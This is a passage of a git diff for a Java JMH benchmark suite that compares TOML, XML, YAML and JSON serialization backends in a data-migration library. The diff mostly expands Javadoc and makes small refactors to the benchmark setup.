{@link JacksonTomlOps}
+ *
Jackson Dataformat TOML
+ *
{@code JsonNode}
+ *
Configuration files, Rust ecosystem integration
+ *
+ *
+ *
{@link JacksonXmlOps}
+ *
Jackson Dataformat XML
+ *
{@code JsonNode}
+ *
Legacy systems, SOAP/REST APIs, document formats
+ *
+ *
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
payloadSize
SMALL, MEDIUM
Test data complexity (LARGE excluded for performance)
+ *
+ *
+ *
Note: The LARGE payload size is excluded from this benchmark because
+ * TOML and XML serialization typically have higher overhead than JSON/YAML,
+ * making large payloads impractical for typical use cases.
Measures the time to create a complete test data structure using
+ * Jackson's TOML dataformat module.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void tomlGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- JacksonTomlOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.tomlOps, this.payloadSize);
blackhole.consume(data);
}
/**
- * Benchmarks XML data generation.
+ * Benchmarks Dynamic object generation using JacksonXmlOps.
+ *
+ *
Measures the time to create a complete test data structure using
+ * Jackson's XML dataformat module.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void xmlGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- JacksonXmlOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.xmlOps, this.payloadSize);
blackhole.consume(data);
}
- // ==================== Field Access ====================
+ // ==================== Field Access Benchmarks ====================
/**
- * Benchmarks TOML field read access.
+ * Benchmarks field read access on TOML-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * TOML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void tomlFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.tomlData.get("stringField0");
+ final Dynamic field = this.tomlData.get(FIELD_NAME);
blackhole.consume(field);
}
/**
- * Benchmarks XML field read access.
+ * Benchmarks field read access on XML-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * XML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void xmlFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.xmlData.get("stringField0");
+ final Dynamic field = this.xmlData.get(FIELD_NAME);
blackhole.consume(field);
}
- // ==================== Field Modification ====================
+ // ==================== Field Modification Benchmarks ====================
/**
- * Benchmarks TOML field set operation.
+ * Benchmarks field set operation on TOML-backed Dynamic.
+ *
+ *
Measures the time to add a new field to a TOML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void tomlFieldSet(final Blackhole blackhole) {
final Dynamic result = this.tomlData.set(
- "newField", this.tomlData.createString("newValue"));
+ "newField",
+ this.tomlData.createString("newValue")
+ );
blackhole.consume(result);
}
/**
- * Benchmarks XML field set operation.
+ * Benchmarks field set operation on XML-backed Dynamic.
+ *
+ *
Measures the time to add a new field to an XML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void xmlFieldSet(final Blackhole blackhole) {
final Dynamic result = this.xmlData.set(
- "newField", this.xmlData.createString("newValue"));
+ "newField",
+ this.xmlData.createString("newValue")
+ );
blackhole.consume(result);
}
- // ==================== Migration ====================
+ // ==================== Migration Benchmarks ====================
/**
- * Benchmarks migration with TOML DynamicOps.
+ * Benchmarks DataFixer migration on TOML-backed data.
+ *
+ *
Measures the time to apply a single fix migration to TOML-based
+ * Dynamic data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -171,12 +332,16 @@ public void tomlMigration(final Blackhole blackhole) {
BenchmarkBootstrap.BENCHMARK_TYPE,
this.tomlData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks migration with XML DynamicOps.
+ * Benchmarks DataFixer migration on XML-backed data.
+ *
+ *
Measures the time to apply a single fix migration to XML-based
+ * Dynamic data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -186,7 +351,8 @@ public void xmlMigration(final Blackhole blackhole) {
BenchmarkBootstrap.BENCHMARK_TYPE,
this.xmlData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
index c387455..c0f2862 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/YamlBenchmark.java
@@ -48,12 +48,97 @@
import java.util.concurrent.TimeUnit;
/**
- * JMH benchmark comparing SnakeYAML and Jackson YAML performance.
+ * JMH benchmark comparing YAML DynamicOps implementations: SnakeYAML vs Jackson YAML.
*
- *
Measures DynamicOps operations and migration performance for both
- * YAML implementations.
+ *
This benchmark measures the performance of YAML-based operations using two
+ * different underlying libraries: SnakeYAML ({@link SnakeYamlOps}) and Jackson YAML
+ * ({@link JacksonYamlOps}). YAML is commonly used for configuration files and
+ * human-readable data serialization.
+ *
+ *
Benchmark Categories
+ *
+ *
Data Generation
+ *
Measure Dynamic object construction performance:
+ *
+ *
{@link #snakeYamlGenerate} - Create Dynamic using SnakeYamlOps
+ *
{@link #jacksonYamlGenerate} - Create Dynamic using JacksonYamlOps
+ *
+ *
+ *
Field Access
+ *
Measure field read operations on existing data:
+ *
+ *
{@link #snakeYamlFieldRead} - Read field from SnakeYAML-backed Dynamic
+ *
{@link #jacksonYamlFieldRead} - Read field from Jackson YAML-backed Dynamic
+ *
+ *
+ *
Field Modification
+ *
Measure field write/set operations:
+ *
+ *
{@link #snakeYamlFieldSet} - Set field on SnakeYAML-backed Dynamic
+ *
{@link #jacksonYamlFieldSet} - Set field on Jackson YAML-backed Dynamic
+ *
+ *
+ *
Migration
+ *
Measure DataFixer migration performance:
+ *
+ *
{@link #snakeYamlMigration} - Apply fix to SnakeYAML-backed data
+ *
{@link #jacksonYamlMigration} - Apply fix to Jackson YAML-backed data
+ *
+ *
+ *
Implementations Compared
+ *
+ *
Implementation
Library
Node Type
Characteristics
+ *
+ *
{@link SnakeYamlOps}
+ *
SnakeYAML
+ *
{@code Object} (native Java types)
+ *
Native YAML library, uses Maps/Lists, anchors & aliases support
+ *
+ *
+ *
{@link JacksonYamlOps}
+ *
Jackson Dataformat YAML
+ *
{@code JsonNode}
+ *
Unified Jackson API, shares code with JSON, streaming support
+ *
+ *
+ *
+ *
Parameters
+ *
+ *
Parameter
Values
Description
+ *
payloadSize
SMALL, MEDIUM, LARGE
Test data complexity
+ *
+ *
+ *
Benchmark Configuration
+ *
+ *
Setting
Value
+ *
Warmup
5 iterations, 1 second each
+ *
Measurement
10 iterations, 1 second each
+ *
Forks
2
+ *
JVM Heap
2 GB min/max
+ *
Time Unit
Microseconds
+ *
+ *
+ *
Usage
+ *
{@code
+ * # Run all YAML benchmarks
+ * java -jar benchmarks.jar YamlBenchmark
+ *
+ * # Compare only generation performance
+ * java -jar benchmarks.jar "YamlBenchmark.*Generate"
+ *
+ * # Run SnakeYAML-only benchmarks
+ * java -jar benchmarks.jar "YamlBenchmark.snakeYaml.*"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar YamlBenchmark -p payloadSize=MEDIUM
+ * }
*
* @author Erik Pförtner
+ * @see JsonBenchmark
+ * @see TomlXmlBenchmark
+ * @see CrossFormatBenchmark
+ * @see de.splatgames.aether.datafixers.codec.yaml.snakeyaml.SnakeYamlOps
+ * @see de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps
* @since 1.0.0
*/
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@@ -64,104 +149,176 @@
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class YamlBenchmark {
+ /**
+ * Field name used for read/write benchmarks.
+ *
+ *
References the first string field generated by {@link BenchmarkDataGenerator}.
+ */
+ private static final String FIELD_NAME = "stringField0";
+
+ /**
+ * Payload size parameter controlling test data complexity.
+ *
+ *
Injected by JMH to run benchmarks across different data sizes.
+ */
@Param({"SMALL", "MEDIUM", "LARGE"})
private PayloadSize payloadSize;
+ /**
+ * SnakeYAML DynamicOps implementation using native Java types.
+ */
+ private SnakeYamlOps snakeOps;
+
+ /**
+ * Jackson YAML DynamicOps implementation using JsonNode.
+ */
+ private JacksonYamlOps jacksonOps;
+
+ /**
+ * Pre-generated test data using SnakeYAML.
+ */
private Dynamic snakeYamlData;
+
+ /**
+ * Pre-generated test data using Jackson YAML.
+ */
private Dynamic jacksonYamlData;
+
+ /**
+ * DataFixer for migration benchmarks.
+ */
private DataFixer fixer;
+
+ /**
+ * Source version for migrations (v1).
+ */
private DataVersion fromVersion;
+
+ /**
+ * Target version for migrations (v2).
+ */
private DataVersion toVersion;
+ /**
+ * Initializes DynamicOps instances, test data, and DataFixer.
+ *
+ *
Both SnakeYAML and Jackson YAML data are pre-generated to isolate
+ * benchmark measurements from data creation overhead.
Measures the time to create a complete test data structure using
+ * SnakeYAML's native Java type representation (Maps and Lists).
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- SnakeYamlOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.snakeOps, this.payloadSize);
blackhole.consume(data);
}
/**
- * Benchmarks Jackson YAML data generation.
+ * Benchmarks Dynamic object generation using JacksonYamlOps.
+ *
+ *
Measures the time to create a complete test data structure using
+ * Jackson's JsonNode representation for YAML.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlGenerate(final Blackhole blackhole) {
- final Dynamic data = BenchmarkDataGenerator.generate(
- JacksonYamlOps.INSTANCE, this.payloadSize);
+ final Dynamic data = BenchmarkDataGenerator.generate(this.jacksonOps, this.payloadSize);
blackhole.consume(data);
}
- // ==================== Field Access ====================
+ // ==================== Field Access Benchmarks ====================
/**
- * Benchmarks SnakeYAML field read access.
+ * Benchmarks field read access on SnakeYAML-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * SnakeYAML-based Dynamic object (backed by Java Map).
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.snakeYamlData.get("stringField0");
+ final Dynamic field = this.snakeYamlData.get(FIELD_NAME);
blackhole.consume(field);
}
/**
- * Benchmarks Jackson YAML field read access.
+ * Benchmarks field read access on Jackson YAML-backed Dynamic.
+ *
+ *
Measures the time to retrieve a single field from a pre-existing
+ * Jackson YAML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlFieldRead(final Blackhole blackhole) {
- final Dynamic field = this.jacksonYamlData.get("stringField0");
+ final Dynamic field = this.jacksonYamlData.get(FIELD_NAME);
blackhole.consume(field);
}
- // ==================== Field Modification ====================
+ // ==================== Field Modification Benchmarks ====================
/**
- * Benchmarks SnakeYAML field set operation.
+ * Benchmarks field set operation on SnakeYAML-backed Dynamic.
+ *
+ *
Measures the time to add a new field to a SnakeYAML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void snakeYamlFieldSet(final Blackhole blackhole) {
final Dynamic result = this.snakeYamlData.set(
- "newField", this.snakeYamlData.createString("newValue"));
+ "newField",
+ this.snakeYamlData.createString("newValue")
+ );
blackhole.consume(result);
}
/**
- * Benchmarks Jackson YAML field set operation.
+ * Benchmarks field set operation on Jackson YAML-backed Dynamic.
+ *
+ *
Measures the time to add a new field to a Jackson YAML-based Dynamic object.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@Benchmark
public void jacksonYamlFieldSet(final Blackhole blackhole) {
final Dynamic result = this.jacksonYamlData.set(
- "newField", this.jacksonYamlData.createString("newValue"));
+ "newField",
+ this.jacksonYamlData.createString("newValue")
+ );
blackhole.consume(result);
}
- // ==================== Migration ====================
+ // ==================== Migration Benchmarks ====================
/**
- * Benchmarks migration with SnakeYAML DynamicOps.
+ * Benchmarks DataFixer migration on SnakeYAML-backed data.
+ *
+ *
Measures the time to apply a single fix migration to SnakeYAML-based
+ * Dynamic data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -171,12 +328,16 @@ public void snakeYamlMigration(final Blackhole blackhole) {
BenchmarkBootstrap.BENCHMARK_TYPE,
this.snakeYamlData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
/**
- * Benchmarks migration with Jackson YAML DynamicOps.
+ * Benchmarks DataFixer migration on Jackson YAML-backed data.
+ *
+ *
Measures the time to apply a single fix migration to Jackson YAML-based
+ * Dynamic data.
*
* @param blackhole JMH blackhole to prevent dead code elimination
*/
@@ -186,7 +347,8 @@ public void jacksonYamlMigration(final Blackhole blackhole) {
BenchmarkBootstrap.BENCHMARK_TYPE,
this.jacksonYamlData,
this.fromVersion,
- this.toVersion);
+ this.toVersion
+ );
blackhole.consume(result);
}
}
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java
new file mode 100644
index 0000000..d2c5b40
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/format/package-info.java
@@ -0,0 +1,158 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * Format-focused JMH benchmarks comparing DynamicOps implementations in the Aether DataFixers framework.
+ *
+ *
This package contains benchmarks that compare the performance of different serialization
+ * format implementations. These benchmarks help users choose the optimal DynamicOps implementation
+ * for their specific use case based on empirical performance data.
Each format benchmark measures the following operations:
+ *
+ *
Data Generation: Time to create Dynamic objects from scratch
+ *
Field Read: Time to retrieve a single field from existing data
+ *
Field Set: Time to add/modify a field (creates new immutable structure)
+ *
Migration: Time to apply a DataFix to format-specific data
+ *
+ *
+ *
Running Format Benchmarks
+ *
{@code
+ * # Run all format benchmarks
+ * java -jar benchmarks.jar ".*format.*"
+ *
+ * # Run specific format benchmark
+ * java -jar benchmarks.jar JsonBenchmark
+ * java -jar benchmarks.jar YamlBenchmark
+ * java -jar benchmarks.jar TomlXmlBenchmark
+ * java -jar benchmarks.jar CrossFormatBenchmark
+ *
+ * # Run all JSON-related benchmarks
+ * java -jar benchmarks.jar ".*Json.*"
+ *
+ * # Run generation benchmarks across all formats
+ * java -jar benchmarks.jar ".*Benchmark.*Generate"
+ *
+ * # Run migration benchmarks across all formats
+ * java -jar benchmarks.jar ".*Benchmark.*Migration"
+ *
+ * # Run with specific payload size
+ * java -jar benchmarks.jar ".*format.*" -p payloadSize=MEDIUM
+ * }
+ *
+ *
Choosing a DynamicOps Implementation
+ *
Use these benchmark results to guide implementation selection:
+ *
+ *
Scenario
Recommended
Rationale
+ *
+ *
General JSON processing
+ *
GsonOps or JacksonJsonOps
+ *
Compare benchmarks; both are mature and fast
+ *
+ *
+ *
Configuration files (YAML)
+ *
SnakeYamlOps
+ *
Native YAML features (anchors, aliases)
+ *
+ *
+ *
Mixed Jackson ecosystem
+ *
JacksonJsonOps/JacksonYamlOps
+ *
Shared code, faster cross-format conversion
+ *
+ *
+ *
TOML configuration
+ *
JacksonTomlOps
+ *
Only TOML option; good for Rust interop
+ *
+ *
+ *
Legacy XML systems
+ *
JacksonXmlOps
+ *
Only XML option; document format support
+ *
+ *
+ *
+ *
Cross-Format Conversion
+ *
The {@link de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark}
+ * measures conversion overhead between formats. Key insights:
+ *
+ *
Same-ecosystem: Jackson JSON ↔ Jackson YAML is fastest (shared JsonNode)
+ *
Cross-ecosystem: Gson ↔ SnakeYAML requires full tree traversal
+ *
Asymmetry: A→B may differ from B→A due to construction costs
+ *
+ *
+ *
Interpreting Results
+ *
+ *
Throughput: Higher ops/sec is better for high-volume scenarios
+ *
Average time: Lower latency is better for interactive applications
+ *
Scaling: Compare SMALL vs MEDIUM vs LARGE to understand data volume impact
+ *
Variance: High ± values may indicate GC sensitivity or JIT instability
+ *
+ *
+ * @see de.splatgames.aether.datafixers.benchmarks.format.JsonBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.format.YamlBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.format.TomlXmlBenchmark
+ * @see de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark
+ * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps
+ * @since 1.0.0
+ */
+package de.splatgames.aether.datafixers.benchmarks.format;
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java
new file mode 100644
index 0000000..be94d9b
--- /dev/null
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java
@@ -0,0 +1,191 @@
+/*
+ * Copyright (c) 2026 Splatgames.de Software and Contributors
+ *
+ * Permission is hereby granted, free of charge, to any person obtaining a copy
+ * of this software and associated documentation files (the "Software"), to deal
+ * in the Software without restriction, including without limitation the rights
+ * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+ * copies of the Software, and to permit persons to whom the Software is
+ * furnished to do so, subject to the following conditions:
+ *
+ * The above copyright notice and this permission notice shall be included in all
+ * copies or substantial portions of the Software.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+ * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+ * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+ * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+ * SOFTWARE.
+ */
+
+/**
+ * JMH benchmark suite for the Aether DataFixers framework.
+ *
+ *
This package and its sub-packages provide comprehensive performance benchmarks
+ * for all major components of the Aether DataFixers system. The benchmarks use
+ * JMH (Java Microbenchmark Harness)
+ * for accurate, reliable performance measurements.
Creates fixers with varying numbers of fixes to measure migration
- * chain performance. All fixes use {@link NoOpDataFixerContext} to minimize
- * logging overhead during benchmarks.
+ *
This utility class provides various DataFixer configurations for measuring
+ * different aspects of migration performance. All created fixers use {@link NoOpDataFixerContext} to eliminate logging
+ * overhead during benchmark measurements.
+ *
+ *
Available Fixer Configurations
+ *
+ *
Method
Fix Count
Fix Types
Use Case
+ *
+ *
{@link #createSingleFixFixer()}
+ *
1
+ *
Rename
+ *
Baseline single-operation performance
+ *
+ *
+ *
{@link #createIdentityFixer()}
+ *
1
+ *
Identity (no-op)
+ *
Framework overhead measurement
+ *
+ *
+ *
{@link #createChainFixer(int)}
+ *
1-100
+ *
Rename (homogeneous)
+ *
Chain length scaling analysis
+ *
+ *
+ *
{@link #createMixedFixer(int)}
+ *
4+
+ *
Rename, Add, Remove, Transform
+ *
Realistic migration scenarios
+ *
+ *
+ *
{@link #createPlayerFixer()}
+ *
4
+ *
Mixed (realistic)
+ *
Domain-specific migration testing
+ *
+ *
+ *
+ *
Type References
+ *
Two type references are provided for categorizing benchmark data:
+ *
+ *
{@link #BENCHMARK_TYPE} - Generic benchmark data (used by most benchmarks)
+ *
{@link #PLAYER_TYPE} - Player-like data structures (for domain-specific tests)
+ *
+ *
+ *
Design Considerations
+ *
+ *
No-op context: All fixers use {@link NoOpDataFixerContext} to prevent
+ * logging from affecting benchmark measurements
+ *
GsonOps: All fixes use {@link GsonOps} as the reference DynamicOps
+ * implementation for consistency
+ *
Testkit integration: Uses {@link QuickFix} from the testkit module
+ * for efficient fix creation
*
* @author Erik Pförtner
+ * @see BenchmarkDataGenerator
+ * @see PayloadSize
+ * @see de.splatgames.aether.datafixers.testkit.factory.QuickFix
* @since 1.0.0
*/
public final class BenchmarkBootstrap {
/**
- * Type reference for benchmark data.
+ * Type reference for generic benchmark data.
+ *
+ *
Used by most benchmarks as the default type for test data. The type
+ * name "benchmark" is intentionally generic to avoid confusion with domain-specific types.
*/
public static final TypeReference BENCHMARK_TYPE = new TypeReference("benchmark");
/**
* Type reference for player-like benchmark data.
+ *
+ *
Used by benchmarks that simulate game player data migrations,
+ * providing a realistic domain-specific testing scenario.
+ *
+ * @see #createPlayerFixer()
+ * @see BenchmarkDataGenerator#generatePlayerData(DynamicOps)
*/
public static final TypeReference PLAYER_TYPE = new TypeReference("player");
+ /**
+ * Private constructor to prevent instantiation.
+ */
private BenchmarkBootstrap() {
// Utility class
}
/**
- * Creates a DataFixer with a single rename field fix.
+ * Creates a DataFixer with a single field rename fix (v1 → v2).
+ *
+ *
This is the simplest non-trivial fixer configuration, useful for
+ * measuring baseline single-operation performance. The fix renames a field from "oldName" to "newName".
+ *
+ *
Version mapping: v1 → v2 (single step)
*
* @return a new DataFixer configured for single-fix benchmarks
+ * @see #createIdentityFixer()
*/
@NotNull
public static DataFixer createSingleFixFixer() {
@@ -79,10 +173,22 @@ public static DataFixer createSingleFixFixer() {
/**
* Creates a DataFixer with an identity fix (no-op transformation).
*
- *
Useful as a baseline to measure framework overhead without
- * actual data transformation.
+ *
The identity fixer passes data through without modification, useful for
+ * measuring pure framework overhead including:
+ *
+ *
Version checking and fix selection
+ *
Dynamic wrapper creation and manipulation
+ *
DataResult monad operations
+ *
Type reference resolution
+ *
+ *
+ *
Comparing identity fixer performance against {@link #createSingleFixFixer()}
+ * reveals the actual cost of field operations versus framework overhead.
*
- * @return a new DataFixer with identity fix
+ *
Version mapping: v1 → v2 (no data changes)
+ *
+ * @return a new DataFixer with an identity (pass-through) fix
+ * @see #createSingleFixFixer()
*/
@NotNull
public static DataFixer createIdentityFixer() {
@@ -93,14 +199,29 @@ public static DataFixer createIdentityFixer() {
}
/**
- * Creates a DataFixer with a chain of sequential fixes.
+ * Creates a DataFixer with a chain of sequential homogeneous fixes.
+ *
+ *
Each fix in the chain performs a field rename operation (field1 → field2,
+ * field2 → field3, etc.), simulating migration scenarios with multiple consecutive version upgrades. This
+ * configuration is ideal for measuring how migration performance scales with chain length.
*
- *
Each fix in the chain performs a field rename operation,
- * simulating real-world migration scenarios with multiple version upgrades.
*
- * @param fixCount the number of fixes in the chain (1 to 100)
- * @return a new DataFixer with the specified number of fixes
+ *
Typical Parameter Values for Benchmarks
+ *
+ *
fixCount
Scenario
+ *
1
Baseline (compare with {@link #createSingleFixFixer()})
+ *
5
Short chain (minor version updates)
+ *
10
Medium chain (typical upgrade path)
+ *
25
Long chain (significant version gap)
+ *
50
Stress test (extended migration)
+ *
100
Maximum supported (extreme case)
+ *
+ *
+ * @param fixCount the number of fixes in the chain (must be between 1 and 100 inclusive)
+ * @return a new DataFixer with the specified number of sequential rename fixes
* @throws IllegalArgumentException if fixCount is less than 1 or greater than 100
+ * @see #createMixedFixer(int)
*/
@NotNull
public static DataFixer createChainFixer(final int fixCount) {
@@ -126,13 +247,29 @@ public static DataFixer createChainFixer(final int fixCount) {
}
/**
- * Creates a DataFixer with mixed fix types for realistic benchmarking.
+ * Creates a DataFixer with mixed heterogeneous fix types for realistic benchmarking.
+ *
+ *
Unlike {@link #createChainFixer(int)} which uses only rename operations,
+ * this method creates a chain with rotating fix types that more accurately represent real-world migration
+ * scenarios:
*
- *
Includes rename, add field, remove field, and transform operations
- * to simulate a realistic migration chain.
+ *
+ *
Position (mod 4)
Fix Type
Operation
+ *
0
Rename
Renames a field
+ *
1
Add
Adds a new string field with default value
+ *
2
Remove
Removes a field
+ *
3
Transform
Transforms field value (string concatenation)
+ *
*
- * @param fixCount the number of fixes in the chain (must be >= 4)
- * @return a new DataFixer with mixed fix types
+ *
Comparing mixed fixer performance against chain fixer performance
+ * reveals the relative cost of different fix operations.
+ *
+ * @param fixCount the number of fixes in the chain (must be at least 4 to include all fix types)
+ * @return a new DataFixer with mixed fix types cycling through rename, add, remove, and transform operations
+ * @throws IllegalArgumentException if fixCount is less than 4
+ * @see #createChainFixer(int)
*/
@NotNull
public static DataFixer createMixedFixer(final int fixCount) {
@@ -156,7 +293,23 @@ public static DataFixer createMixedFixer(final int fixCount) {
/**
* Creates a DataFixer for player data migration benchmarks.
*
- * @return a new DataFixer configured for player data
+ *
This fixer simulates a realistic game player data migration scenario
+ * with four sequential fixes representing typical schema evolution:
+ *
+ *
+ *
Version
Fix
Description
+ *
v1 → v2
Rename
{@code name} → {@code playerName}
+ *
v2 → v3
Add
Add {@code score} field (default: 0)
+ *
v3 → v4
Transform
Double the {@code level} value
+ *
v4 → v5
Remove
Remove {@code tempField}
+ *
+ *
+ *
Use with {@link BenchmarkDataGenerator#generatePlayerData(DynamicOps)} for
+ * complete domain-specific migration testing.
+ *
+ * @return a new DataFixer configured for player data migrations (v1 → v5)
+ * @see #PLAYER_TYPE
+ * @see BenchmarkDataGenerator#generatePlayerData(DynamicOps)
*/
@NotNull
public static DataFixer createPlayerFixer() {
@@ -178,11 +331,20 @@ public static DataFixer createPlayerFixer() {
.build();
}
- private static DataFix createMixedFix(
- final int fromVersion,
- final int toVersion,
- final int fixType
- ) {
+ /**
+ * Creates a specific fix type based on the fixType selector.
+ *
+ *
Internal factory method used by {@link #createMixedFixer(int)} to create
+ * different fix types in a rotating pattern.
+ *
+ * @param fromVersion the source version for the fix
+ * @param toVersion the target version for the fix
+ * @param fixType the fix type selector (0=rename, 1=add, 2=remove, 3=transform)
+ * @return a DataFix of the specified type
+ */
+ private static DataFix createMixedFix(final int fromVersion,
+ final int toVersion,
+ final int fixType) {
return switch (fixType) {
case 0 -> QuickFix.renameField(
GsonOps.INSTANCE,
diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
index 7f48696..e3b635e 100644
--- a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
+++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java
@@ -29,41 +29,125 @@
import org.jetbrains.annotations.NotNull;
/**
- * Utility class for generating benchmark test data.
+ * Factory for generating benchmark test data with configurable complexity.
*
- *
Generates {@link Dynamic} objects with configurable complexity based on
- * {@link PayloadSize} settings. Uses the testkit's {@link TestDataBuilder}
- * for efficient, format-agnostic data construction.
+ *
This utility class creates {@link Dynamic} objects of varying sizes and
+ * structures for use in JMH benchmarks. Data generation is format-agnostic, working with any {@link DynamicOps}
+ * implementation.
+ *
+ *
Data Generation Methods
+ *
+ *
Method
Structure
Use Case
+ *
+ *
{@link #generate(DynamicOps, PayloadSize)}
+ *
Complex (fields + nesting + lists)
+ *
General-purpose benchmarks
+ *
+ *
+ *
{@link #generatePlayerData(DynamicOps)}
+ *
Domain-specific (player data)
+ *
Realistic migration scenarios
+ *
+ *
+ *
{@link #generateFlat(DynamicOps, int)}
+ *
Flat object (fields only)
+ *
Basic operation benchmarks
+ *
+ *
+ *
+ *
Generated Data Structure
+ *
The main {@link #generate(DynamicOps, PayloadSize)} method creates objects with:
Testkit integration: Uses {@link TestDataBuilder} for fluent,
+ * type-safe data construction
+ *
Format agnostic: Works with any DynamicOps (Gson, Jackson, YAML, etc.)
+ *
Mostly deterministic: Generated data is reproducible for benchmark
 + * consistency, apart from timestamp fields, which vary per run
+ *
Configurable complexity: {@link PayloadSize} controls data volume
+ *
+ *
+ *
Usage Example
+ *
{@code
+ * // In a JMH benchmark
+ * @Setup(Level.Iteration)
+ * public void setup() {
+ * // Generate medium-complexity test data
+ * this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);
+ *
+ * // Or generate player-specific data
+ * this.playerData = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
